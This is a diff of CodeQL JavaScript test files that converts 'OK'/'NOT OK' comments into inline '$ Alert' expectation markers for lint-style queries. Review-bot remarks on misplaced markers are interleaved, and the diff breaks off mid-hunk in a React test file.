diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js index c819b10ad56a..24134e1ca07c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/tst.js @@ -1,43 +1,38 @@ -// BAD: Loop upper bound is off-by-one -for (var i = 0; i <= args.length; i++) { +for (var i = 0; i <= args.length; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// BAD: Loop upper bound is off-by-one -for (var i = 0; args.length >= i; i++) { +for (var i = 0; args.length >= i; i++) { // $ Alert - Loop upper bound is off-by-one console.log(args[i]); } -// GOOD: Loop upper bound is correct +// OK - Loop upper bound is correct for (var i = 0; i < args.length; i++) { console.log(args[i]); } var j = 0; -// BAD: Off-by-one on index validity check -if (j <= args.length) { +if (j <= args.length) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// BAD: Off-by-one on index validity check -if (args.length >= j) { +if (args.length >= j) { // $ Alert - Off-by-one on index validity check console.log(args[j]); } -// GOOD: Correct terminating value +// OK - Correct terminating value if (args.length > j) { console.log(args[j]); } -// BAD: incorrect upper bound -function badContains(a, elt) { +function badContains(a, elt) { // $ Alert - incorrect upper bound for (let i = 0; i <= a.length; ++i) if (a[i] === elt) return true; return false; } -// GOOD: correct upper bound +// OK - correct upper bound function goodContains(a, elt) { for (let i = 0; i < a.length; ++i) if (a[i] === elt) 
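Review bot: The marker for `badContains` ended up on `function badContains(a, elt) { // $ Alert - incorrect upper bound`, but the off-by-one comparison `i <= a.length` is on the `for` line below it. Inline expectations are matched against the line where the result is reported, so this marker presumably belongs on the loop header: `for (let i = 0; i <= a.length; ++i) // $ Alert - incorrect upper bound`. The other four markers in this hunk sit on the line that holds the comparison, so this looks like a side effect of moving a comment that used to stand above the function. It is worth confirming against the query's actual result location before the expected output is regenerated, since a misplaced marker would otherwise show up as one spurious and one missing alert.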
@@ -53,7 +48,7 @@ function same(a, b) { return true; } -// GOOD: incorrect upper bound, but extra check +// OK - incorrect upper bound, but extra check function badContains(a, elt) { for (let i = 0; i <= a.length; ++i) if (i !== a.length && a[i] === elt) diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts index 1198d2c5ff74..120fa7098ee5 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/ts-test.ts @@ -1,41 +1,38 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; function f({ x: string, - y: string // NOT OK + y: string // $ Alert }) { } -function g({x, y}: {x: string, y: string}) { // OK +function g({x, y}: {x: string, y: string}) { } function blah(arg) { var { x: x, y: { - x: x, // NOT OK + x: x, // $ Alert y: { - x: x // NOT OK + x: x // $ Alert } } } = arg; } -function h({x: string, y: string}: any) { // NOT OK +function h({x: string, y: string}: any) { // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js index 0e6b79f4675f..017499000358 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/tst.js 
@@ -1,17 +1,14 @@ function distanceFromOrigin(point) { - // NOT OK - var [x, x] = point; + var [x, x] = point; // $ Alert return Math.sqrt(x*x + y*y); } -// NOT OK -var { x: x, y: x } = o; +var { x: x, y: x } = o; // $ Alert + +var { x, x } = o; // $ Alert -// NOT OK -var { x, x } = o; -// OK var { x: x, x: y } = o; -// OK + var { p = x, q = x } = o; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js index 5d83bad877dc..a74ffbc860a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/tst.js @@ -1,24 +1,20 @@ -// NOT OK -(0).foo = 42; +(0).foo = 42; // $ Alert -// NOT OK, but already flagged by SuspiciousPropAccess.ql -null.bar = 23; undefined.baz = 42; +null.bar = 23; undefined.baz = 42; // OK - already flagged by SuspiciousPropAccess.ql function f() { var s = ""; for (var i=0;i<10;++i) - // NOT OK - s[i] = " "; + s[i] = " "; // $ Alert } function g(b) { var x = b ? "" : 42, z; - // NOT OK - x.y = true; - // OK: we don't know the type of `b` + x.y = true; // $ Alert + // OK - we don't know the type of `b` b.y = true; return; - // OK: no types inferred for `z`, since this is dead code + // OK - no types inferred for `z`, since this is dead code z.y = true; } @@ -26,4 +22,4 @@ function h() { let tmp; let obj = (tmp ||= {}); obj.p = 42; -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js index 9b1d6f668923..b440cc2dd5ed 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js 
@@ -1,22 +1,22 @@ function tst() { - var a = { // NOT OK + var a = { // $ Alert 'i': 1, 'j': 2 } - return 1 // NOT OK + return 1 // $ Alert - if (condition) { // OK + if (condition) { } - for (i = 0; i < 10; i++) { // OK + for (i = 0; i < 10; i++) { } - label: while (condition) { // OK - break label; // OK + label: while (condition) { + break label; } - return 1; // OK + return 1; //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js index 22439c1e4f91..19b6a3824805 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js @@ -5,7 +5,7 @@ function A() { return _a; }, set a(v) { - // OK + _a = v|0 }, @@ -13,19 +13,18 @@ function A() { return _x; }, set x(v) { - // NOT OK - }, + }, // $ Alert get y() { return 56; }, set y(v) { - // OK + throw new Error("Cannot mutate y."); }, set z(v) { - // OK + _z = arguments[0] | 0; } }; @@ -36,7 +35,6 @@ function Point(x, y) { get x() { return x; }, set x(_x) { x = _x|0; }, get y() { return y; }, - // NOT OK - set y(_y) { x = _x|0; } + set y(_y) { x = _x|0; } // $ Alert }; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js index 4211400e6c48..5c7ea043cbe2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js @@ -1,17 +1,16 @@ var o = { _secret_x: 42, get x() { - // OK + return 42; }, set x(v) { if (v !== 42) - // OK + return; _secret_x = v; }, set y(w) { - // NOT OK - return "nope"; + return "nope"; // $ Alert } } \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js index 928edcd7fd3e..07f4446800b0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js @@ -1,7 +1,7 @@ class Class1 { constructor(x) { this.x = x; } } -new Class1(42, 23); // NOT OK: `23` is ignored +new Class1(42, 23); // $ Alert - `23` is ignored class Sup { constructor(x) { this.x = x; } @@ -10,12 +10,12 @@ class Sup { class Sub extends Sup { } -new Sub(42); // OK: synthetic constructor delegates to super constructor +new Sub(42); // OK - synthetic constructor delegates to super constructor class Other {} -new Other(42); // NOT OK: `42` is ignored +new Other(42); // $ Alert - `42` is ignored var args = []; -f(...args); // OK -f(42, ...args); // NOT OK \ No newline at end of file +f(...args); +f(42, ...args); // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js index 3771a18ed876..e41ddd2d0136 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js @@ -4,7 +4,7 @@ function global() {return;} window.global = function (x) {return;}; })(this); -global(x); // OK: might refer to function on line 4 +global(x); // OK - might refer to function on line 4 function otherglobal() {return;} 
@@ -12,6 +12,6 @@ var o = { otherglobal: function (x) {return;} }; -otherglobal(x); // NOT OK: can never refer to function on line 12 -otherglobal.call(null, x); // NOT OK -otherglobal.call(null, x, y); // NOT OK +otherglobal(x); // $ Alert - can never refer to function on line 12 +otherglobal.call(null, x); // $ Alert +otherglobal.call(null, x, y); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts index d166c957858e..d17b5d33459f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts @@ -1,4 +1,4 @@ function foo(this: void, x: number) {return;} -foo(45); // OK -foo(null, 45); // NOT OK +foo(45); +foo(null, 45); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 1caa88564a1a..046ca3aec677 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -7,8 +7,7 @@ function g() { return 23; } -// NOT OK -f(g()); +f(g()); // $ Alert function sum() { var result = 0; @@ -17,28 +16,26 @@ function sum() { return result; } -// OK + sum(1, 2, 3); function h(k) { k = k || function() {}; - // OK + k(42); } -// OK + new Array(1, 2, 3); -// NOT OK -new String(1, 2, 3); +new String(1, 2, 3); // $ Alert (function(f) { - // NOT OK - f(42); + f(42); // $ Alert })(function() {return;}); (function h(f) { - // OK + f(42); h(function(x) { return x; }); })(function() {}); 
@@ -67,15 +64,15 @@ parseFloat("123", 10); constructor(){ } } - nonEmpty(42); // NOT OK - empty(42); // OK - emptyWithParam(42, 87); // OK - commentedEmpty(42); // OK - commentedEmptyWithSpreadParam(42, 87); // OK - emptyArrow(42); // NOT OK - new ImplicitEmptyConstructor(42); // NOT OK - new ExplicitEmptyConstructor(42); // NOT OK - parseFloat("123", 10); // NOT OK + nonEmpty(42); // $ Alert + empty(42); + emptyWithParam(42, 87); + commentedEmpty(42); + commentedEmptyWithSpreadParam(42, 87); + emptyArrow(42); // $ Alert + new ImplicitEmptyConstructor(42); // $ Alert + new ExplicitEmptyConstructor(42); // $ Alert + parseFloat("123", 10); // $ Alert }); (function testWhitelistThrowingFunctions() { @@ -111,14 +108,14 @@ parseFloat("123", 10); } })(); } - notAPlainThrower1(42); // NOT OK - notAPlainThrower2(42); // NOT OK - notAPlainThrower3(42); // NOT OK - thrower(42); // OK - throwerArrow(42); // OK - throwerCustom(42); // OK - throwerWithParam(42, 87); // NOT OK - throwerIndirect(42); // OK, but still flagged due to complexity + notAPlainThrower1(42); // $ Alert + notAPlainThrower2(42); // $ Alert + notAPlainThrower3(42); // $ Alert + thrower(42); + throwerArrow(42); + throwerCustom(42); + throwerWithParam(42, 87); // $ Alert + throwerIndirect(42); // OK - but still flagged due to complexity }); function sum2() { @@ -128,14 +125,14 @@ function sum2() { return result; } -// OK + sum2(1, 2, 3); const $ = function (x, arr) { console.log(x, arr); }; -// OK + async function tagThing(repoUrl, directory) { await $`git clone ${repoUrl} ${directory}`; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js index 583daac6ccca..6965cab8bae0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js 
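Review bot: In the `@@ -111,14 +108,14 @@` hunk of SpuriousArguments/tst.js, `throwerIndirect(42); // OK - but still flagged due to complexity` says the call is flagged but carries no `$` expectation, unlike every other flagged call in the file. If the query still reports this call, the line should record the false positive explicitly, for example `throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity`. If it no longer reports it, the "still flagged" wording is stale and should be dropped. The enclosing function starts outside the hunk, so this is judged from the call list alone.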
@@ -1,25 +1,20 @@ var o = { A: function f(x) { 'use strict'; - // BAD - if (!(this instanceof arguments.callee)) - // BAD - return new arguments.callee(x); - // BAD - console.log(f.caller); - // BAD - this.y = f.arguments; + if (!(this instanceof arguments.callee)) // $ Alert + return new arguments.callee(x); // $ Alert + console.log(f.caller); // $ Alert + this.y = f.arguments; // $ Alert this.x = x; } }; var D = class extends function() { - // BAD - return arguments.callee; + return arguments.callee; // $ Alert } {}; function g() { - // OK + return arguments.caller.length; } @@ -27,8 +22,7 @@ function g() { 'use strict'; function h() { var foo = Math.random() > 0.5 ? h : arguments; - // BAD - return foo.caller; + return foo.caller; // $ Alert } })(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js index 65a61da7a616..6ea353f77b5e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js @@ -37,7 +37,7 @@ function foo1() { const foobar = 4; const data = {name: name, date: date}; - writer.emit("Name: ${name}, Date: ${date}.", data); // OK + writer.emit("Name: ${name}, Date: ${date}.", data); - writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // NOT OK - `foobar` is not in `data`. + writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // $ Alert - `foobar` is not in `data`. } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js index a68f3ad35f9b..7a61221e8a90 100644 
--- a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/tst.js @@ -1,6 +1,5 @@ function idMaker(){ var index = 0; while(true) - // NOT OK - yield index++; + yield index++; // $ Alert } diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js index b4645ff98881..d7799470bc2f 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/main.js @@ -20,7 +20,7 @@ k.foo; var l = require('./l'); l.foo(); -l.bar(); // not OK +l.bar(); // $ Alert require('./m').foo; diff --git a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js index cacb69772fe9..7eb45e2cfabb 100644 --- a/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js +++ b/javascript/ql/test/query-tests/NodeJS/DubiousImport/multi_import.js @@ -10,10 +10,10 @@ if (cond) { } if (cond) { - mod1.call(); // OK: `mod1` is `./b`, which exports `call` + mod1.call(); // OK - `mod1` is `./b`, which exports `call` } else { - mod1.bar; // OK: `mod1` is `./c`, which exports `bar` - mod2.bar; // NOT OK: `mod2` is `./b`, which does not export `call` + mod1.bar; // OK - `mod1` is `./c`, which exports `bar` + mod2.bar; // $ Alert - `mod2` is `./b`, which does not export `call` } module.exports = {}; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js index 83bd3009a8ba..61a2663a7ad6 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst.js @@ -1,2 +1,2 @@ -exports.a = 23; // OK -exports = 56; // NOT OK +exports.a = 23; +exports = 56; // $ Alert 
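Review bot: The explanation on the rewritten `mod2.bar` line in DubiousImport/multi_import.js names the wrong export. It says `./b` does not export `call`, but the first branch of the same `if` states that `./b` exports `call`, and the access being flagged is `bar`. Since the line is rewritten anyway, the trailing text should end with "which does not export `bar`", keeping the `// $ Alert` marker as is.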
diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js index c650950972b5..f02b2cdaa4f7 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2a.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = module.exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js index 67a979faef7a..f3c20feff45f 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2b.js @@ -1,3 +1,3 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` module.exports = exports = {}; exports.a = 23; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js index 18089f129a6e..d7269a450093 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst2c.js @@ -1,4 +1,4 @@ -// OK: use of `exports` as shorthand for `module.exports` +// OK - use of `exports` as shorthand for `module.exports` exports = {}; exports.a = 23; module.exports = exports; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js index 93448cd102f9..78ea98c06292 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query exports = module.exports = { a: 23 }; 
diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js index 679437bd5b9d..e638381c2690 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst3b.js @@ -1,2 +1,2 @@ -// OK: useless assignment flagged by other query +// OK - useless assignment flagged by other query module.exports = exports = { a: 23 }; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js index c24fd42b6dd9..2a5f22cb49d8 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst4.js @@ -1,2 +1,2 @@ -module.exports.a = 23; // OK -module.exports = 56; // OK +module.exports.a = 23; +module.exports = 56; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js index 4b93bb8f7f40..9361a968088c 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst5.js @@ -1,4 +1,4 @@ module.exports = exports; -exports = {}; // NOT OK, reassignment above should appear below +exports = {}; // $ Alert - reassignment above should appear below exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js index d91971d6f519..cf5eb12ff0ac 100644 --- a/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js +++ b/javascript/ql/test/query-tests/NodeJS/InvalidExport/tst6.js @@ -1,4 +1,4 @@ var e = {}; module.exports = e; -exports = e; // OK +exports = e; exports.a = 12; diff --git a/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js b/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js index 9a561d4a340d..8023c7511b64 100644 
--- a/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/MissingExports/tst.js @@ -4,19 +4,19 @@ exports.baz = 56; exports.alert = 72; /*global bar*/ -bar(); // OK +bar(); baz = function() {}; -baz(); // OK +baz(); -alert(); // OK +alert(); -exports.isNaN = isNaN // OK +exports.isNaN = isNaN || function(x) { return x !== x; }; exports.someGlobal = 100; -someGlobal(); // OK +someGlobal(); window.otherGlobal = function() {}; exports.otherGlobal = otherGlobal; -otherGlobal(); // OK +otherGlobal(); diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js index 750fbe53712d..9e6301b5bb38 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/subsub/tst.js @@ -1,2 +1,2 @@ -require('baz'); // OK: declared in ../../package.json (though not in ./package.json) -require('mod'); // OK: found in ../node_modules/mod \ No newline at end of file +require('baz'); // OK - declared in ../../package.json (though not in ./package.json) +require('mod'); // OK - found in ../node_modules/mod \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js index ba7d097a552e..abc92ca81047 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/sub/tst.js @@ -1,2 +1,2 @@ -require('baz'); // OK: declared in ../package.json -require('mod'); // OK: found in ./node_modules/mod \ No newline at end of file +require('baz'); // OK - declared in ../package.json +require('mod'); // OK - found in ./node_modules/mod \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js index 878d59a100d4..b5d9982bd4e0 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/src/tst.js @@ -1,11 +1,11 @@ -require('fs'); // OK: there is an externs file for it -require('other'); // NOT OK: there is an externs file, but it is not a Node.js module -require('foo'); // OK: declared as a dependency -require('bar/sub'); // OK: 'bar' declared as a dependency -require('./local'); // OK: local import -require('/global'); // OK: global import -require('mod'); // NOT OK -require('undeclared'); // NOT OK -require('jade!./template.jade'); // OK: WebPack loader -require('imports?$=jquery!./m.js'); // OK: WebPack shim -require('react'); // OK: peer dependency \ No newline at end of file +require('fs'); // OK - there is an externs file for it +require('other'); // $ Alert - there is an externs file, but it is not a Node.js module +require('foo'); // OK - declared as a dependency +require('bar/sub'); // OK - 'bar' declared as a dependency +require('./local'); // OK - local import +require('/global'); // OK - global import +require('mod'); // $ Alert +require('undeclared'); // $ Alert +require('jade!./template.jade'); // OK - WebPack loader +require('imports?$=jquery!./m.js'); // OK - WebPack shim +require('react'); // OK - peer dependency \ No newline at end of file diff --git a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js index ae78d6699400..b11ad45452ef 100644 --- a/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js +++ b/javascript/ql/test/query-tests/NodeJS/UnresolvableImport/tst.js 
@@ -1 +1 @@ -require('m'); // OK: no package.json, so assume incomplete code and don't flag \ No newline at end of file +require('m'); // OK - no package.json, so assume incomplete code and don't flag \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js b/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js index c379b0ba530e..4ab65194e8df 100644 --- a/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js +++ b/javascript/ql/test/query-tests/Performance/NonLocalForIn/tst.js @@ -1,27 +1,24 @@ var o = { x: 1, y: 2, z: 3 }; -// OK: toplevel for-in +// OK - toplevel for-in for (var p in o); function f() { - // OK: local variable + // OK - local variable for (var p in o); } function g() { - // NOT OK: property - var q = [], i = 0; + var q = [], i = 0; // $ Alert - property for (q[i++] in o); } function h() { - // NOT OK: global - for (p in o); + for (p in o); // $ Alert - global } function k() { - // NOT OK: captured - for (var p in o); + for (var p in o); // $ Alert - captured return function() { return p; }; @@ -30,15 +27,13 @@ function k() { function l() { var p; function m() { - // NOT OK: captured - for (p in o); + for (p in o); // $ Alert - captured } } function m() { - // NOT OK: global - for (p of o); + for (p of o); // $ Alert - global } -// OK: toplevel +// OK - toplevel for (p of o); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js index 577fc79d5879..efe3e1cd14b0 100644 --- a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js +++ b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/tst.js @@ -1,5 +1,4 @@ -// NOT OK -function sum(xs, start) { +function sum(xs, start) { // $ Alert if (arguments.length < 2) start = 0; 
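Review bot: In `g()` of NonLocalForIn/tst.js the `// $ Alert - property` marker ends up on `var q = [], i = 0;`, while the loop it describes, `for (q[i++] in o);`, is the unchanged line below it. Every other case in this hunk and the next (`h`, `k`, `m` inside `l`, and the `for...of` case) carries the marker on the `for` line itself. This looks like the old leading comment was attached to whichever statement came next. If the result is reported on the loop, as the other markers suggest, the two lines should read `var q = [], i = 0;` and `for (q[i++] in o); // $ Alert - property`.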
@@ -10,7 +9,7 @@ function sum(xs, start) { return sum; } -// OK + function sum(xs, start) { if (typeof start === 'undefined') start = 0; @@ -22,7 +21,7 @@ function sum(xs, start) { return sum; } -// OK + function sum(xs, _start) { var start = arguments.length < 2 ? _start : 0; diff --git a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js index 835818f144d7..9e87ae3819bc 100644 --- a/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js +++ b/javascript/ql/test/query-tests/React/InconsistentStateUpdate/tst.js @@ -1,7 +1,7 @@ class C1 extends React.Component { upd8() { this.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -9,7 +9,7 @@ class C1 extends React.Component { class C2 extends React.Component { upd8() { this.setState((prevState) => { - counter: prevState.counter + 1 // OK + counter: prevState.counter + 1 }); } } @@ -18,7 +18,7 @@ class C3 extends React.Component { upd8() { var app = this; app.setState({ - counter: this.state.counter + 1 // NOT OK, but ignored because it is safe in practice + counter: this.state.counter + 1 // OK - ignored because it is safe in practice }); } } @@ -26,7 +26,7 @@ class C3 extends React.Component { class C4 extends React.Component { upd8() { this.setState({ - counter: this.state.foo // NOT OK + counter: this.state.foo // $ Alert }); } } @@ -34,7 +34,7 @@ class C4 extends React.Component { class C5 extends React.Component { upd8() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } } 
@@ -42,13 +42,13 @@ class C5 extends React.Component { class C7 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo // NOT OK + foo: this.state.foo // $ Alert }); } } @@ -56,13 +56,13 @@ class C7 extends React.Component { class C8 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo + 1 // NOT OK + foo: this.state.foo + 1 // $ Alert }); } upd8b() { this.setState({ - foo: this.state.foo + 1 // NOT OK + foo: this.state.foo + 1 // $ Alert }); } } @@ -70,13 +70,13 @@ class C8 extends React.Component { class C9 extends React.Component { upd8a() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } upd8b() { this.setState({ - foo: { bar: this.state.foo.bar } // NOT OK + foo: { bar: this.state.foo.bar } // $ Alert }); } } @@ -84,14 +84,14 @@ class C9 extends React.Component { class C10 extends React.Component { upd8a() { this.setState({ - foo: this.state.foo, // NOT OK - bar: this.state.bar // 